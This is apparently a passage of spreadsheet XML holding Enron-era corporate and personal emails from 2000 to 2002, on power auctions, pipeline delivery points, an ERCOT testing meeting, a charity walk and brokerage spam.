Sent:	Wednesday, October 24, 2001 9:58 AM_x000D_
To:	Julie Turner; Papa; Moon, Eric; Granny; Frank Jimenez_x000D_
Subject:	Fw: Why Palestenians throw rocks_x000D_
_x000D_
Subject: FW: Why Palestenians throw rocks_x000D_
_x000D_
_x000D_
&gt; --------------------------------------------------------------------------_x000D_
--_x000D_
&gt; --- &lt;&lt;ATT279523.txt&gt;&gt;  &lt;&lt;WHYPALES.MPE&gt;&gt;_x000D_
&gt;_x000D_
_x000D_
 - ATT279523.txt _x000D_
 - WHYPALES.MPE </t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 06:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.pearlman@enron.com'})</t>
  </si>
  <si>
    <t>Upgrading gas</t>
  </si>
  <si>
    <t>Scott,_x000D_
_x000D_
Have you ever heard of anyone upgrading medium Btu gas (like landfill gas for _x000D_
example) in some way to get it up to pipeline specs?  Do you know any Chem. _x000D_
E. type who might have some idea of what it would take to do this?_x000D_
_x000D_
Steve</t>
  </si>
  <si>
    <t>Tue, 11 Dec 2001 07:18:12 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Your message</t>
  </si>
  <si>
    <t>Bob, in my reply to Joe Hillings last night, I told him you would be following up with him.  This is his reply to that message. Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Joehillings@aol.com@ENRON  _x000D_
Sent:	Monday, December 10, 2001 9:04 PM_x000D_
To:	Derrick Jr., James_x000D_
Subject:	Re: Your message_x000D_
_x000D_
Thank you Jim. Joe</t>
  </si>
  <si>
    <t>Sun, 1 Oct 2000 03:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: examples of auction processes in Canada</t>
  </si>
  <si>
    <t>Steve, Rob Hemstock  will give you the details of the Alberta PPA auction._x000D_
The only other auction type mechansims of which I am aware in Canada  with_x000D_
respect to power supply are the following:_x000D_
a) Ontario electricity_x000D_
distributors have the  choice of purchasing power  for their default_x000D_
service customers ( called "standard supply customers" here) either_x000D_
directly from the IMO real-time market or from a third party supplier.  If_x000D_
the distributor chooses to secure power from a third party supplier the_x000D_
distributor must employ a formal, transparent and auditible RFP process._x000D_
Many Ontario distributors may opt for third party supply precisely because_x000D_
they want to avoid  cash flow problems comparable to those facing the_x000D_
California IOUs - that is, if an Ontario distributor chooses to buy_x000D_
directly from the real time spot market, it must supply that power to_x000D_
default customers at a  rate fixed by the provincial regulator - the_x000D_
Ontario Energy Board ("OEB") -  and record the difference between the_x000D_
purchase cost and the rates charged in a deferral account.  The amount in_x000D_
the deferral account will be debited or credited to customers periodically._x000D_
However,   the  OEB has fixed the default service rate too low and,_x000D_
accordingly, distributors opting for supply  directly from the IMO real_x000D_
time spot market may face very serious cash flow problems.  The term of the_x000D_
third party supply that may be secured in this fashion is unclear, but as_x000D_
matters stand in Ontario there may be significant regulatory risk in_x000D_
securing supply more than 1 year out.  (This was the first issue in respect_x000D_
of which Enron retained Seabron Adamson and Seab knows the issue well);_x000D_
_x000D_
b) An auction/RFP  process is also included in the_x000D_
"restructuring" plan recently adopted by the Quebec National Assembly in_x000D_
respect of Hydro Quebec.  The key features of that plan are the following:_x000D_
1) a  long term vesting contract between HQ Generation and HQ Distribution_x000D_
under which HQ Generation is obliged to supply HQ Distribution up to 165_x000D_
twh annually;  and 2) the requirement that HQ Generation secure any supply_x000D_
it needs over and above the vested amount  through an RFP process to be_x000D_
approved by le Regie ( the provincial regulator)._x000D_
_x000D_
Aleck</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 05:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PVM NDA</t>
  </si>
  <si>
    <t>Tana, _x000D_
_x000D_
As discussed. please forward a copy of the Enron Net Works NDA to David _x000D_
Hufton at PVM._x000D_
_x000D_
_x000D_
PVM Oil Associates Limited_x000D_
1 Dover Street_x000D_
London W1X3PJ_x000D_
_x000D_
DHUFTON@PVM.CO.UK_x000D_
_x000D_
I will be traveling on Thursday and Friday therefore if you need additional _x000D_
information please call David directly at 011 44 207 3999318._x000D_
_x000D_
Bob</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 22:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: P+ spread options</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
_x000D_
A short follow up on the P+ options._x000D_
_x000D_
Attached is a chart showing historical correlations for calendar spreads _x000D_
between futures contracts.   It shows correlation over four different time _x000D_
horizons up to the roll of the nearest contract in each pair.   As you can _x000D_
see the level is usually higher than 0.98 and often near 0.99.    If our _x000D_
current book of "index P+" options were re-marked at a 98% correlation, it _x000D_
would result in a  reduction in M-T-M value of about $78 million according to _x000D_
my estimate._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 13:31:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kbergman@ercot.com'})</t>
  </si>
  <si>
    <t>frozenset({'testplan@ercot.com', 'rmsvote@ercot.com', 'wms@ercot.com', 'rms@ercot.com', 'tdtwg@ercot.com', 'wmsvote@ercot.com', 'set@ercot.com'})</t>
  </si>
  <si>
    <t>Retail Market Qualification Testing Pre-Orientation Meeting Notice_x000D_
 - Feb 7, 2002</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
A Retail Market Qualification Testing Pre-Orientation meeting will be_x000D_
held on Thursday, February 7 from 9:00 am - 12:00 noon.  The location of_x000D_
the meeting is the Austin Hilton Hotel (see attached link for_x000D_
information -_x000D_
http://www.hilton.com/en/hi/hotels/index.jhtml;jsessionid=JCAZMEFNNDVEHJ_x000D_
31AOQMHZQ?ctyhocn=AUSAHHF)._x000D_
_x000D_
The meeting will be hosted by ERCOT and conducted by the ITPTA. It is_x000D_
strongly recommended that new market participants that intend to_x000D_
participate in the V1.4F2 flight of testing, attend this meeting.  This_x000D_
includes any Market Participant that has not participated in previous_x000D_
Retail Market testing, or a current Market Participant who wishes to be_x000D_
certified with new trading partners._x000D_
?    New CRs entering the Market or Muni-Coops - opting in under version_x000D_
1.4_x000D_
?    CRs entering new territories_x000D_
?    TDSPs_x000D_
_x000D_
The meeting will be primarily focused on Market Testing Requirements for_x000D_
the next flight of testing currently scheduled to start February 28,_x000D_
2002.  For a complete schedule - please review this link -_x000D_
http://stage.ercot.com/FlightCalendar.asp._x000D_
_x000D_
We encourage Market Participants to send at least one representative_x000D_
from their business organization AND at least one representative from_x000D_
their technical organization._x000D_
_x000D_
_x000D_
We will familiarize you with the following:_x000D_
Overview of Retail Market Qualification Testing Process_x000D_
Connectivity and Standards Requirements for New Market Participants,_x000D_
including GISB, FTP, and TX SET._x000D_
Flight v1.4F2 testing Plan, including Timeline_x000D_
TDSP Territory Requirements_x000D_
Basic Questions and Answers_x000D_
_x000D_
Please RSVP to Karen Bergman (kbergman@ercot.com) with name, company_x000D_
name and number of attendees.  The RSVP is due by Monday, Feb. 4th._x000D_
_x000D_
Thank you,_x000D_
Karen Bergman_x000D_
Senior Client Services Representative_x000D_
512-248-3171_x000D_
kbergman@ercot.com_x000D_
_x000D_
_x000D_
In addition, this information will be posted to the ERCOT website, under_x000D_
Texas Retail Testing (http://www.ercot.com/Participants/ITPTA.htm)_x000D_
_x000D_
This email has been sent to the following lists, I apologize if you_x000D_
received this notice multiple times._x000D_
_x000D_
All CR registered with ERCOT_x000D_
All CR registered with PUCT_x000D_
1 2002 RMS and others_x000D_
1 2002 RMS vote_x000D_
1 2002 WMS and others_x000D_
1 2002 WMS vote_x000D_
1 Standard Electronic Transactions_x000D_
1 Texas Test Plan Team_x000D_
1 Texas Data Transport WG_x000D_
Muni / Coop distribution (same used for 1/30/02 workshop notification)</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 05:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bill.votaw@enron.com', 'rshapiro@enron.com', 'bfrank@enron.com', 'gsavage@enron.com', 'tim.belden@enron.com', 'rick.johnson@enron.com', 'ken@kdscommunications.com', 'donna.fulton@enron.com', 'hgovenar@govadv.com', 'sgahn@enron.com', 'jalamo@enron.com', 'ehughes2@enron.com', 'mary.hain@enron.com', 'msmith1@enron.com', 'don.black@enron.com', 'ccalger@enron.com', 'dennis.benevides@enron.com', 'paul.kaufman@enron.com', 'james.d.steffes@enron.com', 'william.s.bradford@enron.com', 'steven.j.kean@enron.com', 'smara@enron.com', 'kgustafs@enron.com', 'leslie.lawner@enron.com', 'carol.moffett@enron.com', 'vsharp@enron.com', 'harry.kingerski@enron.com', 'beverly.aden@enron.com', 'debora.whitehead@enron.com', 'mmilner@enron.com', 'wcurry@enron.com', 'gweiss@enron.com', 'acomnes@enron.com', 'kdenne@enron.com', 'jdasovic@enron.com', 'bhansen@lhom.com', 'emelvin@enron.com', 'david.parquet@enron.com', 'sandra.mccubbin@enron.com', 'dblack@enron.com', 'mday@gmssr.com', 'john.neslage@enron.com', 'joe.hartsoe@enron.com', 'michael.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>Assembly Republicans</t>
  </si>
  <si>
    <t>The attached document was released by the Assembly Republicans in_x000D_
response to the CPUC action._x000D_
_x000D_
_x000D_
_x000D_
 - 3-28-01.pdf</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 16:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jessica.burry@enron.com'})</t>
  </si>
  <si>
    <t>Enron MS Walk &amp; Roll - PLEASE READ</t>
  </si>
  <si>
    <t xml:space="preserve">ENRON MS WALK - RAIN OR SHINE_x000D_
Saturday, April 21_x000D_
Walk Begins 9:00 am sharp_x000D_
World Trade Center _x000D_
121 SW Salmon_x000D_
Portland, Oregon_x000D_
_x000D_
_x000D_
CONGRATULATIONS!  Your commitment to join TEAM ENRON has helped our TEAM be the LARGEST MS team in the state of Oregon.  This is a great achievement and one that we can all be proud of.  Your commitment to this Walk and the pledges you raise will help to find the cause and cure for multiple sclerosis._x000D_
_x000D_
At the time of this email notice, approximately 150 TEAM ENRON walkers have registered.  The following Q&amp;A will provide instructions/directions in order for us to have a successful Walk this Saturday!_x000D_
_x000D_
Where is the Enron MS Walk held this year?_x000D_
This year's Walk begins and ends at 1st &amp; Salmon Street, near the Salmon Street Springs - in Waterfront Park.  Registration will be  directly across the street at Two World Trade Center (middle building of PGE's offices at 2nd &amp; Salmon)._x000D_
_x000D_
What time does the Walk begin and how far is it?_x000D_
The Walk begins at 9:00 am - rain or shine!  You can elect to walk in the 5K or 10K - no decision or commitment needs to be made; just decide the day of the event.  It is recommended, due to parking constraints, that all Walkers arrive downtown by 8:00 am, in order to complete required tasks before the Walk.  _x000D_
_x000D_
Can I bring my dog with me?_x000D_
You sure can!  All TEAM ENRON dogs are welcome to walk with their owners for this great cause.  All dogs should have leashes.  Just be sure to bring along your own pooper-scoopers for this purpose. _x000D_
_x000D_
Where do I meet up with TEAM ENRON?_x000D_
TEAM ENRON walkers will meet around 8:30 am near Salmon Street Springs - look for the TEAM ENRON sign.  There will be lots of activity and people in this area, so plan ahead to meet up with your fellow TEAM ENRON walkers no later than 8:45 am.  _x000D_
_x000D_
I haven't received my TEAM ENRON t-shirt - what do I do?_x000D_
Because of the number of TEAM ENRON registrants and the various locations of our TEAM walkers, it may not be possible to deliver t-shirts to each walker.  Therefore, if you HAVE NOT received your TEAM ENRON t-shirt by the end of the work day on Friday, April 20, please plan on picking up your t-shirt between 8:00-8:30 am on Walk Day.  Pick-up location will be at One World Trade Center on the Bridge Level (at the top of the escalators).  T-shirts will be distributed at this location from 8:00-8:30 am  ONLY.._x000D_
_x000D_
Am I suppose to wear my TEAM ENRON t-shirt at the Walk?_x000D_
Yes, yes, yes!  As the title sponsor of this year's Walk for the state of Oregon, we want to show off our name and support for this great cause!  _x000D_
_x000D_
What if I have NOT turned in my pledge form to a Team Captain before the Walk?_x000D_
No problem.  We encourage you to turn in your pledges at the MS registration tables at Two World Trade Center prior to the Walk that morning.  Most of you have received the yellow notice and white envelope in the mail from the MS Society.  This envelope is to be used to put your pledge form and collected dollars/checks in.  If you did NOT receive the yellow notice and white envelope in the mail from the MS Society, they will provide an envelope for this purpose at the MS Registration table. _x000D_
_x000D_
Upon turning in your pledge form at the Registration table, you will receive an MS walk t-shirt.  (For those that have already turned in their pledges prior to Saturday, the MS Walk t-shirt will be delivered or sent to you.)_x000D_
_x000D_
I thought I was pre-registered and the pledges would be picked up prior to the Walk._x000D_
Again, because of the various locations for our Walkers, it may not be possible to pick up all pledges.   If your pledge form is NOT picked up prior to the end of the work day this Friday, you will need to do the following:_x000D_
1)	Pick up your TEAM ENRON t-shirt (instructions above)_x000D_
2)	Go to MS Registration Table to turn in your pledge form_x000D_
3)	Pick up your MS Walk t-shirt at the same time you turn in your pledge form. (You will only receive your MS Walk t-shirt once your pledge forms have been turned in.)_x000D_
_x000D_
I have a friend that wants to walk but isn't registered, can they register the day of event?_x000D_
Absolutely.  Send that friend to the "Walk On's" table in the Registration area.  Be sure to have them sign on as TEAM ENRON walker!_x000D_
_x000D_
Do I need to bring anything else with me for this Walk?_x000D_
If you plan on carrying anything with you, ie,identification, wallet, MS walk t-shirt, water, umbrella, camera, munchies, etc., you may want to carry a backpack.  _x000D_
_x000D_
_x000D_
Does Enron match employee contributions?_x000D_
Enron will match Enron Broadband Services and Enron North America employee contributions.  If you have not completed a matching form, please contact your team captain.  These employee contributions are matched 100% and adds up easily._x000D_
_x000D_
Is this tax-deductible and how are receipts given?_x000D_
You bet it is tax-deductible.  If a pledge is $75 or greater, a tax-deductible receipt will be sent directly from the MS Society.  However, if the pledge is less than $75 and a receipt is requested, a receipt needs to be provided by the Walker.  You can pick these receipts up at the MS Registration Table or contact Judy Timson, 503/886-0501 or email her at judy_timson@enron.net._x000D_
_x000D_
What if I have not collected all my pledges OR have forgotten my pledge form at home?_x000D_
Not to worry.  You have until May 25 to turn in your pledge forms and dollars to the MS Society, in order to be eligible for the prizes offered by the sponsors of this Walk.  If your pledges are turned in after the MS Walk, they should be sent as follows:_x000D_
_x000D_
			National MS Society_x000D_
			Portland Chapter_x000D_
			1650 NW Naito Parkway_x000D_
			Suite 190_x000D_
			Portland, OR  97209_x000D_
			(Phone 503/223-9511)_x000D_
_x000D_
How does this work for TEAM ENRON prizes IF my pledge form does not get turned in the day of the Event?_x000D_
The TEAM ENRON deadline is earlier due to the key prize award of two round-trip airline tickets on Continental Airlines. In order to be eligible for this prize, you must have ALL your pledges into the MS Society by April 30th. _x000D_
_x000D_
How am I eligible for the two round-trip Continental Airline tickets?_x000D_
One of the TEAM ENRON walkers will walk away with this grand prize.  On May 1, the MS Society will confirm with Judy Timson which TEAM ENRON walker successfully raised the most dollars.  Judy will then contact the grand prize winner by phone. Notification of the WINNING WALKER will be sent out, via email, to all registrants that provided an email address.  GOOD LUCK and continue collecting - you could be the lucky winner of this wonderful prize!_x000D_
_x000D_
_x000D_
I thought there were other incentive prizes - what are they AND how am I eligible for those?_x000D_
For every TEAM ENRON walker participating in the MS Walk, your name will be in a drawing to receive one of the following prizes:_x000D_
?	Overnight Hotel Package at The Benson Hotel_x000D_
?	Overnight Hotel Package at The Riverplace Hotel_x000D_
?	Overnight Hotel Package at The Marriott Downtown Hotel_x000D_
?	Overnight Hotel Package at The Marriott Residence Inn_x000D_
This drawing will take place on April 25.  The winners will be contacted by phone; notification of these WINNING WALKERS will be sent out, via email, to all registrants that provided an email address._x000D_
_x000D_
Are kids allowed to walk and is there a Prize for them?_x000D_
Yes, kids can participate in the Walk.  All kids will be eligible for a $25 gift certificate to Toys-R-Us, with one lucky winner taking home this gift certificate.  This drawing will take place on April 25.  The winner will be contacted by phone; notification of this WINNING WALKER will be sent out, via email, to all registrants that provided an email address._x000D_
_x000D_
Are TEAM ENRON walkers to meet after the Walk?_x000D_
No, due to participating in the 5K or 10K and due to people's own walking times, it would be difficult to hold a gathering afterwards.  However, we encourage all TEAM ENRON walkers to enjoy the activities, booths, music, refreshments, food, etc., that will be provided at the end of the Walk._x000D_
_x000D_
What if I have questions?_x000D_
Please feel free to call Judy Timson, 503/886-0501 or email your question: judy_timson@enron.net.  _x000D_
_x000D_
Walk in good health and have great time!_x000D_
_x000D_
_x000D_
_x000D_
Judy Timson_x000D_
Project Manager Specialist _x000D_
Enron Broadband Services_x000D_
2100 SW River Parkway_x000D_
Portland, Oregon 97201_x000D_
Office: 503-886-0501_x000D_
FAX:  503-886-0102 </t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 04:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'undergrd@haas.berkeley.edu', 'staff@haas.berkeley.edu', 'mba02@haas.berkeley.edu', 'eveningmba@haas.berkeley.edu', 'mba01@haas.berkeley.edu', 'faculty@haas.berkeley.edu', 'allphds@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>Computing Services OUTAGE NOTIFICATION for Sunday, Sep 10</t>
  </si>
  <si>
    <t>Dear Haas Community,_x000D_
_x000D_
Sunday Sep 10th, 2000 between 0600 and noon several Haas  servers will be_x000D_
shut down for planned  maintenance and upgrades.  Servers will include_x000D_
the  SQL database server, hcssql1,  and several other servers for brief_x000D_
periods of time_x000D_
_x000D_
Services affected will be access to SQL databases including the EDULINK_x000D_
services (Career Services, Admissions and Registration), Reserve, Event_x000D_
Center, and Helpdesk.   Other NT servers may be down for  two to three_x000D_
minute outages for maintenance reboots._x000D_
_x000D_
Email services should not be affected, nor should research computing_x000D_
services on Grady._x000D_
_x000D_
As always,  should you experience any problems with computing services_x000D_
following the maintenance, please contact the information desk in the_x000D_
Computer Center, or helpdesk at http://helpdesk.haas.berkeley.edu, phone_x000D_
510/642-0434._x000D_
_x000D_
Your patience is greatly appreciated._x000D_
_x000D_
Thank you._x000D_
_x000D_
-----------------------_x000D_
Haas Computing Services</t>
  </si>
  <si>
    <t>Mon, 17 Apr 2000 04:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mgermany@ch2m.com'})</t>
  </si>
  <si>
    <t>Re: Advantages of being a man...</t>
  </si>
  <si>
    <t>I love being a MAN!!!  Ain't life great?</t>
  </si>
  <si>
    <t>Wed, 26 Dec 2001 06:19:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'beverly.miller@enron.com', 'perry.frazier@enron.com', 'donald.vignaroli@enron.com', 'vernon.mercaldo@enron.com', 'tracy.minter@enron.com', 'mary.draemer@enron.com', 'linda.ward@enron.com', 'gary.spraggins@enron.com', 'james.studebaker@enron.com', 'tk.lohman@enron.com', 'kevin.hyatt@enron.com', 'bert.hernandez@enron.com', 'sigrid.macpherson@enron.com', 'gale.ramsaran@enron.com', 'amy.mulligan@enron.com', 'elizabeth.brown@enron.com', 'christine.mcevoy@enron.com', 'terry.kowalke@enron.com', 'lorraine.lindberg@enron.com', 'john.buchanan@enron.com', 'karen.brostad@enron.com', 'michelle.lokay@enron.com', 'darrell.schoolcraft@enron.com', 'linda.trevino@enron.com'})</t>
  </si>
  <si>
    <t>RE: New Transwestern POI's</t>
  </si>
  <si>
    <t xml:space="preserve">These points have been added to Agave's OBA (CR 24335)._x000D_
_x000D_
DL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Brostad, Karen  _x000D_
Sent:	Friday, December 21, 2001 2:14 PM_x000D_
To:	Brown, Elizabeth; Buchanan, John; Draemer, Mary ; Frazier, Perry; Hernandez, Bert; Hyatt, Kevin; Kowalke, Terry; Lee, Dennis; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle; Macpherson, Sigrid; McEvoy, Christine; Mercaldo, Vernon; Miller, Beverly; Minter, Tracy; Mulligan, Amy; Ramsaran, Gale; Schoolcraft, Darrell; Spraggins, Gary; Studebaker, James ; Trevino, Linda; Vignaroli, Donald; Ward, Linda_x000D_
Subject:	New Transwestern POI's_x000D_
_x000D_
Please be advised the following new points have been established for Transwestern_x000D_
_x000D_
_x000D_
POI Name                  Agave Loco/Eddy County 12 in Loop_x000D_
POI Number                78311_x000D_
Meter #                   10188_x000D_
DRN				   316185_x000D_
Location                  Sec 2, T17S, R29E, Eddy County NM_x000D_
Type                      PDC_x000D_
Operator                  Transwestern Pipeline_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
POI Name                  Agave Dodd_x000D_
POI Number                78308_x000D_
Meter #                   10189_x000D_
DRN			                315750_x000D_
Location                  Sec 15, T17S, R29E_x000D_
Type                      PDC_x000D_
Operator                  Transwestern Pipeline_x000D_
_x000D_
_x000D_
Elizabeth -please look over the lateral ID, marketing lateral ID, the supply basin, etc. and GRI flag and let me know if any changes need to be made. Thanks_x000D_
_x000D_
Karen_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 00:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: This is Cute!</t>
  </si>
  <si>
    <t>-----Original Message-----_x000D_
From: Cornell McGee [mailto:cmcgee@viant.com]_x000D_
Sent: Wednesday, March 08, 2000 10:00 AM_x000D_
To: Tara Abbott_x000D_
Subject: This is Cute!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hope you have a sound card on this one...._x000D_
_x000D_
_x000D_
Message-ID: &lt;5C1861CCF191D31186F300508B6F7018397DB6@adntex02.excel.com&gt;_x000D_
From: Antoinette Bowler &lt;ABowler@excel.com&gt;_x000D_
To: mraduenz@wjade.com_x000D_
Subject: FW: This is Cute!_x000D_
Date: Wed, 8 Mar 2000 10:38:53 -0600_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2650.10)_x000D_
Content-Type: multipart/mixed; _x000D_
boundary="----_=_NextPart_002_01BF89D5.C392DEC8"_x000D_
_x000D_
In case you are missing Asea...she told me to send you this_x000D_
_x000D_
 &lt;&lt;cute.exe&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
 - cute.exe</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 02:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'miguel.garcia@enron.com', 'chad.starnes@enron.com', 'joe.stepenovitch@enron.com', 'lawrence.clayton@enron.com', 'larry.valderrama@enron.com', 'doug.miller@enron.com', 'dean.laurent@enron.com', 'cyril.price@enron.com', 'russell.ballato@enron.com', 'larry.campbell@enron.com', 'jay.wills@enron.com', 'rudy.acevedo@enron.com', 'wayne.herndon@enron.com', 'greg.trefz@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'keller.mayeaux@enron.com', 'larry.jester@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'joe.errigo@enron.com'})</t>
  </si>
  <si>
    <t>MIDWEST Deal 479548.01 Extended in Error</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kayne Coulter/HOU/ECT on 12/15/2000 10:12 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Rebecca M Grace                           12/15/2000 09:35 AM_x000D_
	_x000D_
_x000D_
To: Kayne Coulter/HOU/ECT@ECT_x000D_
cc: Greg Trefz/Corp/Enron@ENRON, Thresa A Allen/HOU/ECT@ECT _x000D_
Subject: MIDWEST Deal 479548.01 Extended in Error_x000D_
_x000D_
Kayne,_x000D_
_x000D_
This has been happening with greater frequency (this is the sixth time this _x000D_
month) - where an hourly trader has added mws to _x000D_
a DP&amp;L deal with no basis for the change.  Normally the unrouted mws which _x000D_
trigger them to think they need an extra_x000D_
schedule is due to misrouting of transmission and deals bring in the wrong _x000D_
time zones._x000D_
_x000D_
Please could you review this problem with Greg and the others in your group._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Rebecca_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Oct 2000 02:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rick.bergsieker@enron.com'})</t>
  </si>
  <si>
    <t>Please get with me before we offer a job to andrew mcclune.  Thanks. _x000D_
_x000D_
Jeff</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 18:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'etradeservice@etrade.0mm.com'})</t>
  </si>
  <si>
    <t>Refer Friends, Get Paid!</t>
  </si>
  <si>
    <t>**************************************************************_x000D_
Earn money when you share the power of E*TRADE with friends_x000D_
and family. Click here to get started:_x000D_
http://e-trade.0mm.com/ETR070002_x000D_
**************************************************************_x000D_
_x000D_
GET $50 FOR EVERY FRIEND (UP TO TEN FRIENDS) YOU REFER WHO_x000D_
BECOMES A NEW E*TRADE BROKERAGE CUSTOMER. YOUR FRIENDS CAN_x000D_
GET $75 AS WELL!(1)_x000D_
_x000D_
Dear SARAH:_x000D_
_x000D_
We've launched an exciting new program here at E*TRADE, and_x000D_
both you and your friends can benefit._x000D_
_x000D_
As an E*TRADE customer, you already know about all the_x000D_
terrific advantages we provide. Things like low trading_x000D_
commissions, valuable market insight, 24-hour customer_x000D_
service, and more._x000D_
_x000D_
Now you can share E*TRADE with your friends and you'll BOTH_x000D_
earn a bonus! We'll send a no-obligation informational_x000D_
e-mail to your friend(s). If a friend opens a new brokerage_x000D_
account, you get $50 and your friend gets $75. Just remember:_x000D_
_x000D_
==============================================================_x000D_
In order to take advantage of this special offer, you must_x000D_
use the link at the top of this e-mail to refer friends._x000D_
==============================================================_x000D_
_x000D_
Within eight weeks of receiving and approving your friend's_x000D_
application, we'll credit $50 to your account and $75 to your_x000D_
friend's account. So get started today. It's the least you_x000D_
could do for a friend (and yourself!)._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
Connie Dotson_x000D_
Chief Service Quality Officer_x000D_
E*TRADE_x000D_
_x000D_
P.S. Don't delay! This offer ends September 30, 2000._x000D_
Bonus limited to 10 referrals._x000D_
_x000D_
============================================================_x000D_
_x000D_
(1) Offer not valid for IRAs, retirement, business, club, or_x000D_
E*TRADE Bank accounts. A credit of $50.00 will post to your_x000D_
account within approximately eight weeks of your friend's_x000D_
application approval and funding. Bonus limited to ten_x000D_
referrals. To be eligible, account holders must maintain_x000D_
minimum funding in all accounts ($1,000 for cash accounts,_x000D_
$2,000 for margin accounts, less trading losses, if any),_x000D_
for a minimum of six months. E*TRADE reserves the right to_x000D_
terminate this offer at any time. Other terms apply._x000D_
_x000D_
E*TRADE Group, Inc. associates and its affiliates; customers_x000D_
of E*TRADE who are associated with other NASDR Member firms_x000D_
or any other broker-dealer not regulated by the NASD, but_x000D_
regulated by another self-regulatory organization are not_x000D_
eligible to participate in this offer._x000D_
_x000D_
System response and account access times may vary due to a_x000D_
variety of factors, including trading volumes, market_x000D_
conditions, system performance, and other factors._x000D_
_x000D_
Copyright (C) 2000 E*TRADE Securities, Inc. All rights_x000D_
reserved. Member NASD/SIPC. E*TRADE is a registered_x000D_
trademark of E*TRADE Securities, Inc. All other trademarks_x000D_
and registered trademarks mentioned herein are the_x000D_
property of their respective holders._x000D_
_x000D_
************************************************************_x000D_
HOW TO UNSUBSCRIBE:_x000D_
You received this e-mail because you registered on the_x000D_
E*TRADE Web site, or on one of our partners' sites. If you_x000D_
do not want to receive partner e-mail offers, or any_x000D_
E*TRADE marketing e-mail, you can change your preferences now at:_x000D_
http://e-trade.0mm.com/ETR070003+sshackl@ect.enron.com ._x000D_
You are subscribed at: sshackl@ect.enron.com. E*TRADE_x000D_
takes your privacy seriously. To learn more about E*TRADE's_x000D_
use of personal information, please read our Privacy Policy at:_x000D_
http://e-trade.0mm.com/ETR070010_x000D_
************************************************************_x000D_
_x000D_
 - att1.htm</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 07:30:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bobg1@griesenbeck.com'})</t>
  </si>
  <si>
    <t>Bob, I'm in D.C.  I'm happy you could use the tickets, but I regret that you didn't get the Astros into the Win column.  That may affect your ability to return.  All the best._x000D_
 Jim Derrick</t>
  </si>
  <si>
    <t>Mon, 23 Jul 2001 07:11:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.yeager@elpaso.com'})</t>
  </si>
  <si>
    <t>RE: Tennis?</t>
  </si>
  <si>
    <t>Ben, I've got a pulled muscle (groin) that I've been trying to nurse for a_x000D_
few months.  Went for a run this weekend and strained it.  I wonder if we_x000D_
could either postpone tennis for a week or so?  If you prefer - I could -_x000D_
but will have to take it fairly easy.  Let me know.  Dave._x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Benjamin.Rogers@enron.com [SMTP:Benjamin.Rogers@enron.com]_x000D_
&gt; Sent:	Friday, July 20, 2001 11:27 AM_x000D_
&gt; To:	Yeager, David_x000D_
&gt; Subject:	RE: Tennis?_x000D_
&gt;_x000D_
&gt; Tuesday sounds good.  Does around 6:00pm work for you?_x000D_
&gt;_x000D_
&gt;     -----Original Message-----_x000D_
&gt;    From:   "Yeager, David" &lt;David.Yeager@ElPaso.com&gt;@ENRON_x000D_
&gt;    Sent:   Friday, July  20, 2001 10:17 AM_x000D_
&gt;    To:     Rogers, Benjamin_x000D_
&gt;    Subject:  RE: Tennis?_x000D_
&gt;_x000D_
&gt;    Ben, good to hear from you.  How about Tuesday?  Monday would also_x000D_
&gt;    probably_x000D_
&gt;    work.  Let me know what is best for you.  Dave._x000D_
&gt;_x000D_
&gt;    &gt; -----Original Message-----_x000D_
&gt;    &gt; From:      Rogers, Benjamin [SMTP:Benjamin.Rogers@ENRON.com]_x000D_
&gt;    &gt; Sent:      Friday, July 20, 2001 9:29 AM_x000D_
&gt;    &gt; To:   Yeager, David_x000D_
&gt;    &gt; Subject:   Tennis?_x000D_
&gt;    &gt;_x000D_
&gt;    &gt; David:_x000D_
